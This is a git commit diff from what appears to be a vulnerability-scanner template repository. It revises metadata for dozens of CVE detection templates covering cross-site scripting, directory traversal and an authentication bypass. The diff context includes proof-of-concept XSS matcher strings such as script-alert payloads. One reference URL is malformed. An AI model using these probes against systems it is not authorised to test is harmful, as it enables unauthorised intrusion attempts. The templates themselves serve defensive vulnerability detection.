Dashboard Content Enhancements (#5324)

Dashboard Content Enhancements
* dos2nix on several templates
* replacing some cvedetails links with NIST

cves/2008/CVE-2008-1059.yaml

@@ -10,7 +10,7 @@ info:
     - https://www.exploit-db.com/exploits/5194
     - https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881
     - https://nvd.nist.gov/vuln/detail/CVE-2008-1059
-    - http://secunia.com/advisories/29099
+    - https://web.archive.org/web/20090615225856/http://secunia.com/advisories/29099/
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5

cves/2008/CVE-2008-1061.yaml

@@ -1,16 +1,15 @@
 id: CVE-2008-1061
 
 info:
-  name: Wordpress Plugin Sniplets 1.2.2 - Cross-Site Scripting
+  name: WordPress Sniplets <=1.2.2 - Cross-Site Scripting
   author: dhiyaneshDK
   severity: medium
   description: |
-    Multiple cross-site scripting (XSS) vulnerabilities in the Sniplets 1.1.2 and 1.2.2 plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) text parameter to (a) warning.php, (b) notice.php, and (c) inset.php in view/sniplets/, and possibly (d) modules/execute.php; the (2) url parameter to (e) view/admin/submenu.php; and the (3) page parameter to (f) view/admin/pager.php.
+    WordPress Sniplets 1.1.2 and 1.2.2 plugin contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the text parameter to warning.php, notice.php, and inset.php in view/sniplets/, and possibly modules/execute.php; via the url parameter to view/admin/submenu.php; and via the page parameter to view/admin/pager.php.
   reference:
     - https://www.exploit-db.com/exploits/5194
     - https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881
     - https://nvd.nist.gov/vuln/detail/CVE-2008-1061
-    - http://secunia.com/advisories/29099
   classification:
     cve-id: CVE-2008-1061
   tags: xss,wp-plugin,wp,edb,wpscan,cve,cve2008,wordpress,sniplets
@@ -35,3 +34,6 @@ requests:
       - type: status
         status:
           - 200
+
+
+# Enhanced by mp on 2022/08/31

cves/2011/CVE-2011-2744.yaml

@@ -7,8 +7,8 @@ info:
   description: A directory traversal vulnerability in Chyrp 2.1 and earlier allows remote attackers to include and execute arbitrary local files via a ..%2F (encoded dot dot slash) in the action parameter to the default URI.
   reference:
     - https://www.exploit-db.com/exploits/35945
-    - https://www.cvedetails.com/cve/CVE-2011-2744
     - http://www.openwall.com/lists/oss-security/2011/07/13/6
+    - https://nvd.nist.gov/vuln/detail/CVE-2011-2744
     - http://web.archive.org/web/20140723162411/http://secunia.com/advisories/45184/
   classification:
     cve-id: CVE-2011-2744

cves/2011/CVE-2011-4804.yaml

@@ -7,9 +7,9 @@ info:
   description: A directory traversal vulnerability in the obSuggest (com_obsuggest) component before 1.8 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
   reference:
     - https://www.exploit-db.com/exploits/36598
-    - https://www.cvedetails.com/cve/CVE-2011-4804
     - http://web.archive.org/web/20140802122115/http://secunia.com/advisories/46844/
     - http://web.archive.org/web/20210121214308/https://www.securityfocus.com/bid/48944/
+    - https://nvd.nist.gov/vuln/detail/CVE-2011-4804
   remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2011-4804

cves/2012/CVE-2012-0896.yaml

@@ -7,9 +7,9 @@ info:
   description: An absolute path traversal vulnerability in download.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to read arbitrary files via the f parameter.
   reference:
     - https://packetstormsecurity.com/files/108631/
-    - https://www.cvedetails.com/cve/CVE-2012-0896
     - http://web.archive.org/web/20140804110141/http://secunia.com/advisories/47529/
     - http://plugins.trac.wordpress.org/changeset/488883/count-per-day
+    - https://https://nvd.nist.gov/vuln/detail/CVE-2012-0896
   classification:
     cve-id: CVE-2012-0896
   metadata:

cves/2013/CVE-2013-5979.yaml

@@ -8,7 +8,6 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/26955
     - https://nvd.nist.gov/vuln/detail/CVE-2013-5979
-    - https://www.cvedetails.com/cve/CVE-2013-5979
     - https://bugs.launchpad.net/xibo/+bug/1093967
   classification:
     cve-id: CVE-2013-5979

cves/2014/CVE-2014-10037.yaml

@@ -7,7 +7,6 @@ info:
   description: A directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impacts via a .. (dot dot) in the url parameter to photoalbum/index.php.
   reference:
     - https://www.exploit-db.com/exploits/30865
-    - https://www.cvedetails.com/cve/CVE-2014-10037
     - https://nvd.nist.gov/vuln/detail/CVE-2014-10037
     - http://www.exploit-db.com/exploits/30865
   classification:

cves/2014/CVE-2014-5368.yaml

@@ -8,7 +8,6 @@ info:
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2014-5368
     - https://www.exploit-db.com/exploits/39287
-    - https://www.cvedetails.com/cve/CVE-2014-5368
     - http://seclists.org/oss-sec/2014/q3/417
   classification:
     cve-id: CVE-2014-5368

cves/2014/CVE-2014-8799.yaml

@@ -8,7 +8,6 @@ info:
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2014-8799
     - https://www.exploit-db.com/exploits/35346
-    - https://www.cvedetails.com/cve/CVE-2014-8799
     - https://wordpress.org/plugins/dukapress/changelog/
   classification:
     cve-id: CVE-2014-8799

cves/2015/CVE-2015-4127.yaml

@@ -1,16 +1,16 @@
 id: CVE-2015-4127
 
 info:
-  name: WordPress Plugin church_admin - Cross-Site Scripting (XSS)
+  name: WordPress Church Admin <0.810 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: |
-    Cross-site scripting (XSS) vulnerability in the church_admin plugin before 0.810 for WordPress allows remote attackers to inject arbitrary web script or HTML via the address parameter, as demonstrated by a request to index.php/2015/05/21/church_admin-registration-form/.
+    WordPress Church Admin plugin before 0.810 allows remote attackers to inject arbitrary web script or HTML via the address parameter via index.php/2015/05/21/church_admin-registration-form/.
   reference:
     - https://www.exploit-db.com/exploits/37112
     - https://wpscan.com/vulnerability/2d5b3707-f58a-4154-93cb-93f7058e3408
-    - https://nvd.nist.gov/vuln/detail/CVE-2015-4127
     - https://wordpress.org/plugins/church-admin/changelog/
+    - https://nvd.nist.gov/vuln/detail/CVE-2015-4127
   classification:
     cve-id: CVE-2015-4127
   tags: wp-plugin,wp,edb,wpscan,cve,cve2015,wordpress,xss
@@ -35,3 +35,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/31

cves/2016/CVE-2016-2389.yaml

@@ -7,7 +7,6 @@ info:
   description: SAP xMII 15.0 for SAP NetWeaver 7.4 is susceptible to a local file inclusion vulnerability in the GetFileList function. This can allow remote attackers to read arbitrary files via a .. (dot dot) in the path parameter to /Catalog, aka SAP Security Note 2230978.
   reference:
     - https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/
-    - https://www.cvedetails.com/cve/CVE-2016-2389
     - http://packetstormsecurity.com/files/137046/SAP-MII-15.0-Directory-Traversal.html
     - https://www.exploit-db.com/exploits/39837/
     - https://nvd.nist.gov/vuln/detail/CVE-2016-2389

cves/2016/CVE-2016-6601.yaml

@@ -6,9 +6,9 @@ info:
   severity: high
   description: Directory traversal vulnerability in the file download functionality in ZOHO WebNMS Framework 5.2 and 5.2 SP1 allows remote attackers to read arbitrary files via a .. (dot dot) in the fileName parameter to servlets/FetchFile
   reference:
-    - https://www.cvedetails.com/cve/CVE-2016-6601
     - https://github.com/pedrib/PoC/blob/master/advisories/webnms-5.2-sp1-pwn.txt
     - https://www.exploit-db.com/exploits/40229/
+    - https://nvd.nist.gov/vuln/detail/CVE-2016-6601
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5

cves/2017/CVE-2017-11629.yaml

@@ -1,15 +1,15 @@
 id: CVE-2017-11629
 
 info:
-  name: FineCms 5.0.10 - Cross Site Scripting
+  name: FineCMS <=5.0.10 - Cross-Site Scripting
   author: ritikchaddha
   severity: medium
   description: |
-    dayrui FineCms through 5.0.10 has Cross Site Scripting (XSS) in controllers/api.php via the function parameter in a c=api&m=data2 request.
+    FineCMS through 5.0.10 contains a cross-site scripting vulnerability in controllers/api.php via the function parameter in a c=api&m=data2 request.
   reference:
     - http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#URL-Redirector-Abuse
-    - https://nvd.nist.gov/vuln/detail/CVE-2017-11629/
     - http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#api-php-Reflected-XSS
+    - https://nvd.nist.gov/vuln/detail/CVE-2017-11629/
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -39,3 +39,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/31

cves/2018/CVE-2018-19386.yaml

@@ -1,14 +1,15 @@
 id: CVE-2018-19386
 
 info:
-  name: SolarWinds Database Performance Analyzer 11.1. 457 - Cross Site Scripting
+  name: SolarWinds Database Performance Analyzer 11.1.457 - Cross-Site Scripting
   author: pikpikcu
   severity: medium
-  description: SolarWinds Database Performance Analyzer 11.1.457 contains an instance of Reflected XSS in its idcStateError component, where the page parameter is reflected into the HREF of the 'Try Again' Button on the page, aka a /iwc/idcStateError.iwc?page= URI.
+  description: SolarWinds Database Performance Analyzer 11.1.457 contains a reflected cross-site scripting vulnerability in its idcStateError component, where the page parameter is reflected into the HREF of the 'Try Again' Button on the page, aka a /iwc/idcStateError.iwc?page= URI.
   reference:
     - https://www.cvedetails.com/cve/CVE-2018-19386/
     - https://i.imgur.com/Y7t2AD6.png
     - https://medium.com/greenwolf-security/reflected-xss-in-solarwinds-database-performance-analyzer-988bd7a5cd5
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-19386
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -28,4 +29,6 @@ requests:
           - 200
       - type: word
         words:
-          - '<a href="javascript:alert(document.domain)//'
+          - '<a href="javascript:alert(document.domain)//'
+
+# Enhanced by mp on 2022/08/31

cves/2018/CVE-2018-19439.yaml

@@ -1,14 +1,15 @@
 id: CVE-2018-19439
 
 info:
-  name: Cross Site Scripting in Oracle Secure Global Desktop Administration Console
+  name: Oracle Secure Global Desktop Administration Console 4.4 - Cross-Site Scripting
   author: madrobot,dwisiswant0
   severity: medium
-  description: XSS exists in the Administration Console in Oracle Secure Global Desktop 4.4 20080807152602 (but was fixed in later versions including 5.4)
+  description: Oracle Secure Global Desktop Administration Console 4.4 contains a reflected cross-site scripting vulnerability in helpwindow.jsp via all parameters, as demonstrated by the sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp windowTitle parameter.
   reference:
     - http://web.archive.org/web/20210124221313/https://www.securityfocus.com/bid/106006/
-    - http://seclists.org/fulldisclosure/2018/Nov/58
     - http://packetstormsecurity.com/files/150444/Oracle-Secure-Global-Desktop-Administration-Console-4.4-Cross-Site-Scripting.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-19439
+  remediation: Fixed in later versions including 5.4.
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -25,3 +26,5 @@ requests:
         words:
           - "<script>alert(1337)</script><!--</TITLE>"
         part: body
+
+# Enhanced by mp on 2022/08/31

cves/2018/CVE-2018-19749.yaml

@@ -5,10 +5,11 @@ info:
   author: arafatansari
   severity: medium
   description: |
-    DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via assets/add/account-owner.php Owner name field.
+    DomainMOD 4.11.01 contains a cross-site scripting vulnerability via assets/add/account-owner.php Owner name field.
   reference:
     - https://github.com/domainmod/domainmod/issues/81
     - https://www.exploit-db.com/exploits/45941/
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-19749
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 4.8
@@ -49,3 +50,5 @@ requests:
           - 'contains(all_headers_3, "text/html")'
           - "contains(body_3, '><script>alert(document.domain)</script></a>')"
         condition: and
+
+# Enhanced by mp on 2022/08/31

cves/2018/CVE-2018-19751.yaml

@@ -5,11 +5,11 @@ info:
   author: arafatansari
   severity: medium
   description: |
-    DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via /admin/ssl-fields/add.php Display Name, Description & Notes fields parameters.
+    DomainMOD 4.11.01 contains a cross-site scripting vulnerability via /admin/ssl-fields/add.php Display Name, Description & Notes field parameters.
   reference:
     - https://www.exploit-db.com/exploits/45947/
-    - https://nvd.nist.gov/vuln/detail/CVE-2018-19751
     - https://github.com/domainmod/domainmod/issues/83
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-19751
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 4.8
@@ -58,3 +58,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/31

cves/2018/CVE-2018-19752.yaml

@@ -5,11 +5,11 @@ info:
   author: arafatansari
   severity: medium
   description: |
-    DomainMOD through 4.11.01 has XSS via the assets/add/registrar.php notes,registrar field.
+    DomainMOD through 4.11.01 contains a cross-site scripting vulnerability via the assets/add/registrar.php notes field for Registrar.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2018-19752
     - https://github.com/domainmod/domainmod/issues/84
     - https://www.exploit-db.com/exploits/45949/
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-19752
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 4.8
@@ -57,3 +57,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/31

cves/2018/CVE-2018-19877.yaml

@@ -1,14 +1,15 @@
 id: CVE-2018-19877
 
 info:
-  name: Adiscon LogAnalyzer 4.1.7 - Cross Site Scripting
+  name: Adiscon LogAnalyzer <4.1.7 - Cross-Site Scripting
   author: arafatansari
   severity: medium
   description: |
-    Adiscon LogAnalyzer  before 4.1.7 is affected by Cross-Site Scripting (XSS) in the 'referer' parameter of the login.php file.
+    Adiscon LogAnalyzer before 4.1.7 contains a cross-site scripting vulnerability in the 'referer' parameter of the login.php file.
   reference:
     - https://loganalyzer.adiscon.com/news/loganalyzer-v4-1-7-v4-stable-released/
     - https://www.exploit-db.com/exploits/45958/
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-19877
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -38,3 +39,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/31

cves/2018/CVE-2018-19892.yaml

@@ -5,10 +5,11 @@ info:
   author: arafatansari
   severity: medium
   description: |
-    DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via /domain//admin/dw/add-server.php DisplayName parameters.
+    DomainMOD 4.11.01 contains a cross-site scripting vulnerability via /domain//admin/dw/add-server.php DisplayName parameters.
   reference:
     - https://www.exploit-db.com/exploits/45959
     - https://github.com/domainmod/domainmod/issues/85
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-19892
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 4.8
@@ -56,3 +57,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/31

cves/2018/CVE-2018-19914.yaml

@@ -5,10 +5,11 @@ info:
   author: arafatansari
   severity: medium
   description: |
-    DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via assets/add/dns.php Profile Name or notes field.
+    DomainMOD 4.11.01 contains a cross-site scripting vulnerability via assets/add/dns.php Profile Name or notes field.
   reference:
     - https://www.exploit-db.com/exploits/46375/
     - https://github.com/domainmod/domainmod/issues/87
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-19914
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 4.8
@@ -49,3 +50,5 @@ requests:
           - 'contains(all_headers_3, "text/html")'
           - 'contains(body_3, "><script>alert(document.domain)</script></a>")'
         condition: and
+
+# Enhanced by mp on 2022/08/31

cves/2019/CVE-2019-1010290.yaml

@@ -7,8 +7,8 @@ info:
   description: Babel Multilingual site Babel All is affected by Open Redirection The impact is Redirection to any URL, which is supplied to redirect  in a newurl parameter. The component is redirect The attack vector is The victim must open a link created by an attacker
   reference:
     - https://untrustednetwork.net/en/2019/02/20/open-redirection-vulnerability-in-babel/
-    - https://www.cvedetails.com/cve/CVE-2019-1010290
     - http://dev.cmsmadesimple.org/project/files/729
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-1010290
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1

cves/2019/CVE-2019-14974.yaml

@@ -4,9 +4,10 @@ info:
   name: SugarCRM Enterprise 9.0.0 - Cross-Site Scripting
   author: madrobot
   severity: medium
-  description: SugarCRM Enterprise 9.0.0 allows mobile/error-not-supported-platform.html?desktop_url= XSS.
+  description: SugarCRM Enterprise 9.0.0 contains a cross-site scripting vulnerability via mobile/error-not-supported-platform.html?desktop_url.
   reference:
     - https://www.exploit-db.com/exploits/47247
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-14974
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -27,3 +28,5 @@ requests:
         words:
           - "url = window.location.search.split(\"?desktop_url=\")[1]"
         part: body
+
+# Enhanced by mp on 2022/08/31

cves/2019/CVE-2019-15501.yaml

@@ -1,14 +1,14 @@
 id: CVE-2019-15501
 
 info:
-  name: LSoft ListServ - XSS
+  name: L-Soft LISTSERV <16.5-2018a - Cross-Site Scripting
   author: LogicalHunter
   severity: medium
-  description: Reflected cross site scripting (XSS) in L-Soft LISTSERV before 16.5-2018a exists via the /scripts/wa.exe OK parameter.
+  description: L-Soft LISTSERV before 16.5-2018a contains a reflected cross-site scripting vulnerability via the /scripts/wa.exe OK parameter.
   reference:
     - https://www.exploit-db.com/exploits/47302
     - http://www.lsoft.com/manuals/16.5/LISTSERV16.5-2018a_WhatsNew.pdf
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15501
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-15501
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -36,3 +36,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/31

cves/2019/CVE-2019-15811.yaml

@@ -1,15 +1,15 @@
 id: CVE-2019-15811
 
 info:
-  name: DomainMOD 4.13.0 - Cross-Site Scripting
+  name: DomainMOD <=4.13.0 - Cross-Site Scripting
   author: arafatansari
   severity: medium
   description: |
-    DomainMOD 4.13.0 is vulnerable to Cross Site Scripting (XSS) via /reporting/domains/cost-by-month.php in Daterange parameters.
+    DomainMOD through 4.13.0 contains a cross-site scripting vulnerability via /reporting/domains/cost-by-month.php in Daterange parameters.
   reference:
     - https://www.exploit-db.com/exploits/47325
     - https://github.com/domainmod/domainmod/issues/108
-    - https://zerodays.lol/
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-15811
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -44,3 +44,5 @@ requests:
           - 'contains(body_2, "value=\"\"onfocus=\"alert(document.domain)\"autofocus=")'
           - 'contains(body_2, "DomainMOD")'
         condition: and
+
+# Enhanced by mp on 2022/08/31

cves/2019/CVE-2019-15889.yaml

@@ -1,14 +1,14 @@
 id: CVE-2019-15889
 
 info:
-  name: WordPress Plugin Download Manager 2.9.93 - Reflected Cross-Site Scripting (XSS)
+  name: WordPress Download Manager <2.9.94 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: The download-manager plugin before 2.9.94 for WordPress has XSS via the category shortcode feature, as demonstrated by the orderby or search[publish_date] parameter.
+  description: WordPress Download Manager plugin before 2.9.94 contains a cross-site scripting vulnerability via the category shortcode feature, as demonstrated by the orderby or search[publish_date] parameter.
   reference:
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15889
     - https://www.cybersecurity-help.cz/vdb/SB2019041819
     - https://wordpress.org/plugins/download-manager/#developers
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-15889
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -36,3 +36,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/31

cves/2019/CVE-2019-16332.yaml

@@ -1,13 +1,14 @@
 id: CVE-2019-16332
 
 info:
-  name: API Bearer Auth <= 20181229 - Reflected Cross-Site Scripting (XSS)
+  name: WordPress API Bearer Auth <20190907 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: In the api-bearer-auth plugin before 20190907 for WordPress, the server parameter is not correctly filtered in the swagger-config.yaml.php file, and it is possible to inject JavaScript code, aka XSS.
+  description: WordPress API Bearer Auth plugin before 20190907 contains a cross-site scripting vulnerability. The server parameter is not correctly filtered in swagger-config.yaml.php.
   reference:
     - https://plugins.trac.wordpress.org/changeset/2152730
     - https://wordpress.org/plugins/api-bearer-auth/#developers
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-16332
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -35,3 +36,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/31

cves/2019/CVE-2019-16525.yaml

@@ -1,15 +1,15 @@
 id: CVE-2019-16525
 
 info:
-  name: Wordpress Plugin Checklist <= 1.1.5 - Reflected Cross-Site Scripting (XSS)
+  name: WordPress Checklist <1.1.9 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: An XSS issue was discovered in the checklist plugin before 1.1.9 for WordPress. The fill parameter is not correctly filtered in the checklist-icon.php file, and it is possible to inject JavaScript code.
+  description: WordPress Checklist plugin before 1.1.9 contains a cross-site scripting vulnerability. The fill parameter is not correctly filtered in the checklist-icon.php file.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2019-16525
     - https://wordpress.org/plugins/checklist/#developers
     - https://packetstormsecurity.com/files/154436/WordPress-Checklist-1.1.5-Cross-Site-Scripting.html
     - https://plugins.trac.wordpress.org/changeset/2155029/
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-16525
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -37,3 +37,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/31

cves/2019/CVE-2019-16931.yaml

@@ -1,16 +1,16 @@
 id: CVE-2019-16931
 
 info:
-  name: Visualizer < 3.3.1 - Stored Cross-Site Scripting (XSS)
+  name: WordPress Visualizer <3.3.1 - Cross-Site Scripting
   author: ritikchaddha
   severity: medium
   description: |
-    By abusing a lack of access controls on the /wp-json/visualizer/v1/update-chart WP-JSON API endpoint, an attacker can arbitrarily modify meta data of an existing chart, and inject a XSS payload to be stored and later executed when an admin goes to edit the chart.
+    WordPress Visualizer plugin before 3.3.1 contains a stored cross-site scripting vulnerability via /wp-json/visualizer/v1/update-chart WP-JSON API endpoint. An unauthenticated attacker can execute arbitrary JavaScript when an admin or other privileged user edits the chart via the admin dashboard.
   reference:
     - https://wpscan.com/vulnerability/867e000d-d2f5-4d53-89b0-41d7d4163f44
     - https://nathandavison.com/blog/wordpress-visualizer-plugin-xss-and-ssrf
-    - https://nvd.nist.gov/vuln/detail/CVE-2019-16931
     - https://wpvulndb.com/vulnerabilities/9893
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-16931
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -44,3 +44,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/31

cves/2019/CVE-2019-17382.yaml

@@ -7,7 +7,7 @@ info:
   description: Zabbix through 4.4 is susceptible to an authentication bypass vulnerability via zabbix.php?action=dashboard.view&dashboardid=1. An attacker can bypass the login page and access the dashboard page, and then create a Dashboard, Report, Screen, or Map without any Username/Password (i.e., anonymously). All created elements (Dashboard/Report/Screen/Map) are accessible by other users and by an admin.
   reference:
     - https://www.exploit-db.com/exploits/47467
-    - https://www.cvedetails.com/cve/CVE-2019-17382/
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-17382
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
     cvss-score: 9.1

cves/2019/CVE-2019-18665.yaml

@@ -9,7 +9,6 @@ info:
   reference:
     - https://atomic111.github.io/article/secudos-domos-directory_traversal
     - https://vuldb.com/?id.144804
-    - https://www.cvedetails.com/cve/CVE-2019-18665
     - https://www.secudos.de/news-und-events/aktuelle-news/domos-release-5-6
     - https://nvd.nist.gov/vuln/detail/CVE-2019-18665
   classification:

cves/2019/CVE-2019-19134.yaml

@@ -1,15 +1,16 @@
 id: CVE-2019-19134
 
 info:
-  name: Hero Maps Premium < 2.2.3 - Unauthenticated Reflected Cross-Site Scripting (XSS)
+  name: WordPress Hero Maps Premium <=2.2.1 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: The Hero Maps Premium plugin 2.2.1 and prior for WordPress is prone to unauthenticated XSS via the views/dashboard/index.php p parameter because it fails to sufficiently sanitize user-supplied input    - https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985
+  description: WordPress Hero Maps Premium plugin 2.2.1 and prior contains an unauthenticated reflected cross-site scripting vulnerability via the views/dashboard/index.php p parameter.
   reference:
     - https://wpscan.com/vulnerability/d179f7fe-e3e7-44b3-9bf8-aab2e90dbe01
     - https://www.hooperlabs.xyz/disclosures/cve-2019-19134.php
     - https://heroplugins.com/product/maps/
     - https://heroplugins.com/changelogs/hmaps/changelog.txt
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-19134
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -37,3 +38,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/31

cves/2019/CVE-2019-19368.yaml

@@ -1,14 +1,15 @@
 id: CVE-2019-19368
 
 info:
-  name: Rumpus FTP Web File Manager 8.2.9.1 XSS
+  name: Rumpus FTP Web File Manager 8.2.9.1 - Cross-Site Scripting
   author: madrobot
   severity: medium
-  description: A Reflected Cross Site Scripting was discovered in the Login page of Rumpus FTP Web File Manager 8.2.9.1. An attacker can exploit it by sending a crafted link to end users and can execute arbitrary Javascripts
+  description: Rumpus FTP Web File Manager 8.2.9.1 contains a reflected cross-site scripting vulnerability via the Login page. An attacker can send a crafted link to end users and can execute arbitrary JavaScript.
   reference:
     - https://github.com/harshit-shukla/CVE-2019-19368/
     - https://www.maxum.com/Rumpus/Download.html
     - http://packetstormsecurity.com/files/155719/Rumpus-FTP-Web-File-Manager-8.2.9.1-Cross-Site-Scripting.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-19368
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -29,3 +30,5 @@ requests:
         words:
           - "value=''><sVg/OnLoAD=alert`1337`//'>"
         part: body
+
+# Enhanced by mp on 2022/08/31

cves/2019/CVE-2019-19908.yaml

@@ -1,14 +1,15 @@
 id: CVE-2019-19908
 
 info:
-  name: phpMyChat-Plus - Cross-Site Scripting
+  name: phpMyChat-Plus 1.98 - Cross-Site Scripting
   author: madrobot
   severity: medium
-  description: phpMyChat-Plus 1.98 is vulnerable to reflected cross-site scripting (XSS) via JavaScript injection into the password reset URL. In the URL, the pmc_username parameter to pass_reset.php is vulnerable.
+  description: phpMyChat-Plus 1.98 contains a cross-site scripting vulnerability via pmc_username parameter of pass_reset.php in password reset URL.
   reference:
     - https://cinzinga.github.io/CVE-2019-19908/
     - http://ciprianmp.com/
     - https://sourceforge.net/projects/phpmychat/
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-19908
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -29,3 +30,5 @@ requests:
         words:
           - "<script>alert(1337)</script>"
         part: body
+
+# Enhanced by mp on 2022/08/31

cves/2019/CVE-2019-20141.yaml

@@ -1,14 +1,15 @@
 id: CVE-2019-20141
 
 info:
-  name: Neon Dashboard - Cross-Site Scripting
+  name: WordPress Laborator Neon Theme 2.0 - Cross-Site Scripting
   author: knassar702
   severity: medium
-  description: An XSS issue was discovered in the Laborator Neon theme 2.0 for WordPress via the data/autosuggest-remote.php q parameter.
+  description: WordPress Laborator Neon theme 2.0 contains a cross-site scripting vulnerability via the data/autosuggest-remote.php q parameter.
   reference:
